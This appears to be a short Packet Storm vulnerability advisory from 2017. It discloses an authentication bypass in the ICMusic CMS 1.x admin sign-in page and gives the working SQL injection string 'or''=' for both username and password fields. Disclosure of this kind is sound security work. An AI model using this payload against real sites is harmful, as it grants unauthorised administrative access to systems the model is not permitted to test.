ICMusic CMS 1.x SQL Injection

2017-03-17T00:00:00
ID PACKETSTORM:141688
Type packetstorm
Reporter Bilal Kardadou
Modified 2017-03-17T00:00:00

Description

                                        
                                            `################################################  
#Title: ICMusic CMS v1.x - Authentication Bypass  
#Credit: Bilal KARDADOU  
#Vendor: http://www.icloudcenter.com  
#Vendor URL: http://www.icloudcenter.com/music-site-script.htm  
#Product: ICMusic CMS v1.x  
#Google Dork: N/A  
################################################  
#  
# Product & Service Introduction:  
#  
# "ICMusic" is a music directory site script, ready for use web directory  
of music providing audio files. The site  
# is available for users in four different languages (English , Spanish,  
Frensh and German). Users may  
# search the directory for desired music files and listen to them. The site  
contains an advanced administration  
# panel for management of the sites data, postings approval and much more.  
#  
# http://localhost/icmusic/admin/signin.php  
#  
# Username: 'or''='  
# Password: 'or''='  
#  
# PoC:  
# http://prntscr.com/el6qal  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)  
################################################  
--   
*Bilal Kardadou*  
IT Security Consultant  
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |  
`